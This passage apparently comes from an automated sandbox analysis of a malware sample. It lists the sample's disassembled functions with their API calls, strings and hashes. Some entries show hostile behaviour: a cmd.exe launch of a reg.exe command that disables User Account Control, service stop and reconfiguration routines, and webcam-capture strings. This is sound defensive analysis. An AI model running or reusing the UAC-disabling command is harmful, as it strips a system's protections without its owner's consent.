                                • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm
                                • API String ID: 2936374016-3206640213
                                • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                • int.LIBCPMT ref: 0040F8D7
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040F917
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                • __Init_thread_footer.LIBCMT ref: 0040F97F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID:
                                • API String ID: 3815856325-0
                                • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                • _free.LIBCMT ref: 0044575C
                                • _free.LIBCMT ref: 00445784
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                • _abort.LIBCMT ref: 004457A3
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: h G
                                • API String ID: 1958988193-3300504347
                                • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041B310
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                • GetLastError.KERNEL32 ref: 0041B335
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                  • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                • _UnwindNestedFrames.LIBCMT ref: 00437631
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID: /zC
                                • API String ID: 2633735394-4132788633
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID: ]tA
                                • API String ID: 4116985748-3517819141
                                • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                • Connection KeepAlive | Disabled, xrefs: 004050D9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: Connection KeepAlive | Disabled
                                • API String ID: 2993684571-3818284553
                                • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                Function 004013F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetCursorInfo$User32.dll$`Mw
                                • API String ID: 1646373207-2986171508
                                • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                  • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                • API String ID: 3469354165-3547787478
                                • Opcode ID: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                • Opcode Fuzzy Hash: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • _free.LIBCMT ref: 00442318
                                • _free.LIBCMT ref: 0044232F
                                • _free.LIBCMT ref: 0044234E
                                • _free.LIBCMT ref: 00442369
                                • _free.LIBCMT ref: 00442380
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                • _free.LIBCMT ref: 004468EC
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00446AB8
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                • __alloca_probe_16.LIBCMT ref: 0044E391
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                • __freea.LIBCMT ref: 0044E3FD
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
